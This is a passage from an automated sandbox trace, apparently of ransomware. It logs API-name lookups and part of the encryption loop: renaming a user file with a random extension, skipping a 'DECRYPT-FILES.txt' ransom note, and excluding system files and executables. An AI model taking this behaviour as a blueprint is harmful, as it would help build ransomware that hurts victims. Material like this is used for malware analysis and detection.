returned="CreateMemoryResourceNotification" [0078.509] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.509] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.509] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.509] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.509] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.509] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.509] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.509] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.509] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.509] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.509] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.509] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.509] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.509] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.509] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.509] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.510] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.510] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.510] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.510] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.510] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.510] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.510] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.510] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.510] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.510] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.510] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.510] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.510] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.510] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.510] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.510] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.510] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.510] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.510] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.511] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.511] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.511] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.511] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.511] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.511] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.511] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.511] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.511] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.511] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.511] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.511] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.511] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.511] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.511] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.511] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.512] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.512] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.512] lstrlenA (lpString="DELETEATOM") returned 10 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.512] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.512] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.512] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.512] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.512] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.512] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.512] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.512] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.512] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.512] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.512] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.512] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.512] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.512] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.512] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.513] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.513] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.513] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.513] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.513] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.513] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.513] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.513] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.513] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.513] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.513] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.513] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.513] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.513] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.513] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.513] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.513] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.513] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.514] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.514] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.514] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.514] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.514] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.514] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.514] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.514] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.514] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 98 [0078.514] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Y2TS7") returned 104 [0078.514] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Y2TS7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.y2ts7"), dwFlags=0x0) returned 1 [0078.525] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.525] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.525] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.525] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaf80ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaafa7000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.525] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.526] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaf80ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.526] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.526] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.526] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.526] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.526] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.526] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.526] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.526] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.526] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.526] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.526] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.526] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.526] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.526] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.526] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.526] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0078.526] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.526] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0078.526] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\jkbimi8.tmp" [0078.526] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.526] CloseHandle (hObject=0x0) returned 0 [0078.527] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.527] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaf80ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.527] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.527] CloseHandle (hObject=0x448) returned 1 [0078.528] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, 